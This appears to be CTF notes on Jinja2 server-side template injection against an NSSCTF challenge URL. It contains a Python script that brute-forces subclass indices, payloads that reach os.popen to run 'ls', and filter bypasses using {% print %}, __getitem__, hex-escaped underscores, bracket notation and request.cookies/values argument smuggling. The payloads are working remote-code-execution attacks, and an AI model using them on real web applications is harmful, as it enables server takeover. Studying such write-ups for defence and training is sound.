{{2*2}}
{{''.__class__}}
{{''.__class__.__bases__[0]}}
{{''.__class__.__bases__[0].__subclasses__}}
import requests
url="http://node1.anna.nssctf.cn:28430/level/1"
#payload={{''.__class__.__bases__[0].__subclasses__()[1]}}
#payload="{{''.__class__.__bases__.__getitem__(0).__subclasses__().__getitem__("+str(i)+"}}"
for i in range(500):
payload = {"code":"{{''.__class__.__bases__[0].__subclasses__()["+str(i)+"]}}"}
#print(payload)
res=requests.post(url=url,data=payload)
#print(res.text)
if "os" in res.text:
print(res.text)
print(payload)
经过测试发现"os._wrap_close"在第133个子类,这时候可以调用133子类
{{''.__class__.__bases__[0].__subclasses__()[133].__init__.__globals__['popen']('ls').read()}}
{{2*2}}
发现被过滤了{{
{%print(2*2)%}
{%print(''.__class__.__bases__[0].__subclasses__()[133].__init__.__globals__['popen']('ls').read())%}
{{''.__class__.__bases__[0]}}
{{''.__class__.__bases__.__getitem__(0).__subclasses__()}}
{{''.__class__.__bases__.__getitem__(0).__subclasses__().__getitem__(133)}}
{{''.__class__.__bases__.__getitem__(0).__subclasses__().__getitem__(133).__init__.__globals__.__getitem__('popen')('ls').read()}}
{{().__class__.__bases__[0].__subclasses__()[133].__init__.__globals__[request.cookies.arg1](request.cookies.arg2).read()}}
{{().__class__.__bases__[0].__subclasses__()[133].__init__.__globals__[request.values.arg1](request.values.arg2).read()}}
{{''["\x5f\x5fclass\x5f\x5f"]["\x5f\x5fbases\x5f\x5f"][0]["\x5f\x5fsubclasses\x5f\x5f"]()[133]["\x5f\x5finit\x5f\x5f"]["\x5f\x5fglobals\x5f\x5f"]['popen']('ls').read()}}
过滤了点,这是可以利用[]绕过
{{''['__class__']['__bases__'][0]['__subclasses__']()[133]['__init__']['__globals__']['popen']('ls')['read']()}}